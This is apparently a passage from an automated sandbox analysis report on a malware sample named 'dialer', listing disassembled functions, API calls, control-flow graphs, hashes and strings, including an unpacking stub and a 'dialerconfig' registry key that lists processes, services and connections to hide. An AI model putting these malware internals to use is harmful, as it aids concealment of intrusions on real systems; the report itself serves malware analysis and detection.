                                                                                • NtQueryFullAttributesFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFileFullQuery
                                                                                • String ID:
                                                                                • API String ID: 3545844373-0
                                                                                • Opcode ID: f71038f0e3432a8f3b164be4f50f2930c35b1c460969590bf0f90e78775cf134
                                                                                • Instruction ID: bfaa91673e3131da4486b8228e2f697fa27fa098225aeef3f4229114262b66f4
                                                                                • Opcode Fuzzy Hash: f71038f0e3432a8f3b164be4f50f2930c35b1c460969590bf0f90e78775cf134
                                                                                • Instruction Fuzzy Hash: 27F09DB2608B4086EAA2DB52F85579A77A0F38D7D4F009919BBC843735DB38C1988F84

                                                                                Non-executed Functions

                                                                                Function 00000001400026E0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 296 1400026e0-14000273b call 140002660 memset 299 140002741-14000274b 296->299 300 14000280e-14000285e call 14000155d 296->300 301 140002774-14000277a 299->301 305 140002953-14000297b call 1400014c7 300->305 306 140002864-140002873 300->306 301->300 304 140002780-140002787 301->304 307 140002789-140002792 304->307 308 140002750-140002752 304->308 323 140002986-1400029c8 call 140001503 call 140005970 memset 305->323 324 14000297d 305->324 309 140002eb7-140002ef4 call 140001370 306->309 310 140002879-140002888 306->310 313 140002794-1400027ab 307->313 314 1400027f8-1400027fb 307->314 311 14000275a-14000276e 308->311 315 1400028e4-14000294e wcsncmp call 1400014e5 310->315 316 14000288a-1400028dd 310->316 311->300 311->301 319 1400027f5 313->319 320 1400027ad-1400027c2 313->320 314->311 315->305 316->315 319->314 325 1400027d0-1400027d7 320->325 332 140002e49-140002e84 call 140001370 323->332 333 1400029ce-1400029d5 323->333 324->323 326 1400027d9-1400027f3 325->326 327 140002800-140002809 325->327 326->319 326->325 327->311 335 1400029d7-140002a0c 332->335 340 140002e8a 332->340 334 140002a13-140002a43 wcscpy wcscat wcslen 333->334 333->335 337 140002a45-140002a76 wcslen 334->337 338 140002a78-140002aa5 334->338 335->334 341 140002aa8-140002abf wcslen 337->341 338->341 340->334 342 140002ac5-140002ad8 341->342 343 140002e8f-140002eab call 140001370 341->343 345 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 342->345 346 140002ada-140002aee 342->346 343->309 364 140002dfd-140002e1b call 140001512 345->364 365 140002e20-140002e48 call 14000145e 345->365 346->345 364->365
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                                • String ID: 0$X$\BaseNamedObjects\ulufoxljdjwhtckuvndvmbau$`
                                                                                • API String ID: 780471329-2590899224
                                                                                • Opcode ID: d8bc8fc7e4f78f97167b8dbf9317a79add4c4b500a37d0f0ebcbe230efc94c19
                                                                                • Instruction ID: 02c86cc2984cac849caf10a33095c616d0d4e11f6c4988ae29273a76e96b46b4
                                                                                • Opcode Fuzzy Hash: d8bc8fc7e4f78f97167b8dbf9317a79add4c4b500a37d0f0ebcbe230efc94c19
                                                                                • Instruction Fuzzy Hash: 721227B2618B8085E762CB26F8443EA77A4F789794F404215EBE957BF5EF78C189C700
                                                                                Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: 87217a8e6000bbfc0c2be15322c96d6386af0d1a3f2dc2985034ce914cf2b36b
                                                                                • Instruction ID: 5f7da3ae107d405e68b1edf1d60b0e34c591a5af8501f008d8300acc40c00392
                                                                                • Opcode Fuzzy Hash: 87217a8e6000bbfc0c2be15322c96d6386af0d1a3f2dc2985034ce914cf2b36b
                                                                                • Instruction Fuzzy Hash: 6751F6B1615A4485FB66EF27F9543EA27A2B78D7C0F449025FB8D873B1DE38C5998300
                                                                                Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 410 140001ba0-140001bc0 411 140001bc2-140001bd7 410->411 412 140001c09 410->412 413 140001be9-140001bf1 411->413 414 140001c0c-140001c17 call 1400023b0 412->414 416 140001bf3-140001c02 413->416 417 140001be0-140001be7 413->417 420 140001cf4-140001cfe call 140001d40 414->420 421 140001c1d-140001c6c call 1400024d0 VirtualQuery 414->421 416->417 419 140001c04 416->419 417->413 417->414 422 140001cd7-140001cf3 memcpy 419->422 425 140001d03-140001d1e call 140001d40 420->425 421->425 428 140001c72-140001c79 421->428 429 140001d23-140001d38 GetLastError call 140001d40 425->429 430 140001c7b-140001c7e 428->430 431 140001c8e-140001c97 428->431 433 140001cd1 430->433 434 140001c80-140001c83 430->434 435 140001ca4-140001ccf VirtualProtect 431->435 436 140001c99-140001c9c 431->436 433->422 434->433 438 140001c85-140001c8a 434->438 435->429 435->433 436->433 439 140001c9e 436->439 438->433 440 140001c8c 438->440 439->435 440->439
                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,0000000140006C1C,0000000140006C1C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,0000000140006C1C,0000000140006C1C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,0000000140006C1C,0000000140006C1C,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: b1b7e208cbfd982792d29b849ac8fe48206c6b00b3f65009bf975a8b8e4bd385
                                                                                • Instruction ID: b4b871632bc00ec96096dee12abb5cd58094b498594b1af434097fef9d7194fa
                                                                                • Opcode Fuzzy Hash: b1b7e208cbfd982792d29b849ac8fe48206c6b00b3f65009bf975a8b8e4bd385
                                                                                • Instruction Fuzzy Hash: 794121F1200A4582FA66DF57F884BE927A1F78DBC4F554126AF0A877B1DA38C58AC700
                                                                                Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 441 140002104-14000210b 442 140002111-140002128 EnterCriticalSection 441->442 443 140002218-140002221 441->443 444 14000220b-140002212 LeaveCriticalSection 442->444 445 14000212e-14000213c 442->445 446 140002272-140002280 443->446 447 140002223-14000222d 443->447 444->443 448 14000214d-140002159 TlsGetValue GetLastError 445->448 449 140002241-140002263 DeleteCriticalSection 447->449 450 14000222f 447->450 452 14000215b-14000215e 448->452 453 140002140-140002147 448->453 449->446 451 140002230-14000223f free 450->451 451->449 451->451 452->453 454 140002160-14000216d 452->454 453->444 453->448 454->453
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                • String ID:
                                                                                • API String ID: 3326252324-0
                                                                                • Opcode ID: 56409736d05acbafabb28bd6c98cf49f7b900e7b0d0542129dea5e3438686952
                                                                                • Instruction ID: 1b2f857d1c11c80ccd1669c0cda9419b2295ebfa2ed7f8f5e033496b962d3f42
                                                                                • Opcode Fuzzy Hash: 56409736d05acbafabb28bd6c98cf49f7b900e7b0d0542129dea5e3438686952
                                                                                • Instruction Fuzzy Hash: 4B21E3B0215A1192FA2BDB53FD443E823A5BB2DBD0F444021FF5A57AB4DF78C9868700
                                                                                Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 456 140001e10-140001e2d 457 140001e3e-140001e48 456->457 458 140001e2f-140001e38 456->458 460 140001ea3-140001ea8 457->460 461 140001e4a-140001e53 457->461 458->457 459 140001f60-140001f69 458->459 460->459 464 140001eae-140001eb3 460->464 462 140001e55-140001e60 461->462 463 140001ecc-140001ed1 461->463 462->460 467 140001f23-140001f2d 463->467 468 140001ed3-140001ee2 signal 463->468 465 140001eb5-140001eba 464->465 466 140001efb-140001f0a call 140005f20 464->466 465->459 472 140001ec0 465->472 466->467 477 140001f0c-140001f10 466->477 470 140001f43-140001f45 467->470 471 140001f2f-140001f3f 467->471 468->467 473 140001ee4-140001ee8 468->473 470->459 471->470 472->467 474 140001eea-140001ef9 signal 473->474 475 140001f4e-140001f53 473->475 474->459 478 140001f5a 475->478 479 140001f12-140001f21 signal 477->479 480 140001f55 477->480 478->459 479->459 480->478
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CCG
                                                                                • API String ID: 0-1584390748
                                                                                • Opcode ID: fce7a999a73daaf90da284007033cb31bb16023eced34f6d8ea2430d44c4fd8d
                                                                                • Instruction ID: 2dbda8d1ddc0485651b81983135d47e8c896bf154ac445d1c6925c92dfcdf9b7
                                                                                • Opcode Fuzzy Hash: fce7a999a73daaf90da284007033cb31bb16023eced34f6d8ea2430d44c4fd8d
                                                                                • Instruction Fuzzy Hash: EB2159B2A0150642FA77DA2BB5943FA1182ABCD7E4F258535BF19473F9DE3C88828241
                                                                                Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 481 140001880-14000189c 482 1400018a2-1400018f9 call 140002420 call 140002660 481->482 483 140001a0f-140001a1f 481->483 482->483 488 1400018ff-140001910 482->488 489 140001912-14000191c 488->489 490 14000193e-140001941 488->490 491 14000194d-140001954 489->491 492 14000191e-140001929 489->492 490->491 493 140001943-140001947 490->493 496 140001956-140001961 491->496 497 14000199e-1400019a6 491->497 492->491 494 14000192b-14000193a 492->494 493->491 495 140001a20-140001a26 493->495 494->490 499 140001b87-140001b98 call 140001d40 495->499 500 140001a2c-140001a37 495->500 501 140001970-14000199c call 140001ba0 496->501 497->483 498 1400019a8-1400019c1 497->498 504 1400019df-1400019e7 498->504 500->497 505 140001a3d-140001a5f 500->505 501->497 508 1400019e9-140001a0d VirtualProtect 504->508 509 1400019d0-1400019dd 504->509 510 140001a7d-140001a97 505->510 508->509 509->483 509->504 511 140001b74-140001b82 call 140001d40 510->511 512 140001a9d-140001afa 510->512 511->499 518 140001b22-140001b26 512->518 519 140001afc-140001b0e 512->519 522 140001b2c-140001b30 518->522 523 140001a70-140001a77 518->523 520 140001b5c-140001b6c 519->520 521 140001b10-140001b20 519->521 520->511 525 140001b6f call 140001d40 520->525 521->518 521->520 522->523 524 140001b36-140001b57 call 140001ba0 522->524 523->497 523->510 524->520 525->511
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: 4d568077bf3a6511ed5fd5d2384f2baeebd9958c330e4c2709e1f785095984e7
                                                                                • Instruction ID: f48d0573b98199f2793b136c5a8b456db72710f94d6882f512d3c02bcf328a4a
                                                                                • Opcode Fuzzy Hash: 4d568077bf3a6511ed5fd5d2384f2baeebd9958c330e4c2709e1f785095984e7
                                                                                • Instruction Fuzzy Hash: 565126B2710A44D6EB22CF67F8407E92762B75DBE8F448221EB19177B4CB38C586C700
                                                                                Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 529 140001800-140001810 530 140001812-140001822 529->530 531 140001824 529->531 532 14000182b-140001867 call 140002290 fprintf 530->532 531->532
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: b6079dff3363becc83fcef3a4e1204cf29f8e4fe9715082ae6ac4d4aca271860
                                                                                • Instruction ID: 69d9501a9c47ad2fd874abcaf6ee1dfba6e3584fb722d73cc25c0902850ad717
                                                                                • Opcode Fuzzy Hash: b6079dff3363becc83fcef3a4e1204cf29f8e4fe9715082ae6ac4d4aca271860
                                                                                • Instruction Fuzzy Hash: 44F09671614A8482E612EB76F9413ED6361E75D7C1F54D211FF4D67662DF38D282C300
                                                                                Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 535 14000219e-1400021a5 536 140002272-140002280 535->536 537 1400021ab-1400021c2 EnterCriticalSection 535->537 538 140002265-14000226c LeaveCriticalSection 537->538 539 1400021c8-1400021d6 537->539 538->536 540 1400021e9-1400021f5 TlsGetValue GetLastError 539->540 541 1400021f7-1400021fa 540->541 542 1400021e0-1400021e7 540->542 541->542 543 1400021fc-140002209 541->543 542->538 542->540 543->542
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002C.00000002.3359695031.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002C.00000002.3359312979.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360110135.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360496076.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002C.00000002.3360882007.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 3a459fcdbc80fe9b62440a1f38410dc30506dfee9ca17ef21d3eb494726ce865
                                                                                • Instruction ID: da2fa759d30cdf420d52835b0a571db0c3b1a4c0d2d073a37084aed344a210a8
                                                                                • Opcode Fuzzy Hash: 3a459fcdbc80fe9b62440a1f38410dc30506dfee9ca17ef21d3eb494726ce865
                                                                                • Instruction Fuzzy Hash: A001AFB5205A1192FA2BDB63FE043E86265BB2CBD1F454021EF1957BB4DF78C9968300

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                                                Executed Functions

                                                                                Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002D.00000002.3359712073.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002D.00000002.3359354811.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002D.00000002.3359712073.00000001404DC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002D.00000002.3359712073.0000000140500000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002D.00000002.3359712073.0000000140503000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002D.00000002.3359712073.000000014078B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002D.00000002.3359712073.000000014080D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002D.00000002.3369758146.0000000140847000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 1941872368-0
                                                                                • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                                • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                                                Executed Functions

                                                                                Function 00000257E10A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 16feaae96375266c24b17968b5a080657b5ae57e6ff703aba3d68dcbcffacad4
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 2F711736358F1486EB15DF22FC5BB9963B4FB88B8AF001561EA4E47A68DF38C444C358
                                                                                Function 00000257E10A328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002E.00000002.3372775288.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_46_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: aade9cdc764c3959dde9a52c1c94ad6719753b48d41f7c1d1db878778cbbdd05
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: A411F93269CF008AFB6EA761FC0F79E2294B7A4347F4081A5D906496D0EF7CC044C62C
                                                                                Function 00000257E10A1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000257E10A1628: GetProcessHeap.KERNEL32 ref: 00000257E10A1633
                                                                                  • Part of subcall function 00000257E10A1628: HeapAlloc.KERNEL32 ref: 00000257E10A1642
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16B2
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16DF
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A16F9
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1719
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1734
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1754
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A176F
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A178F
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17AA
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A17CA
                                                                                • Sleep.KERNEL32 ref: 00000257E10A1AD7
                                                                                • SleepEx.KERNELBASE ref: 00000257E10A1ADD
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17E5
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1805
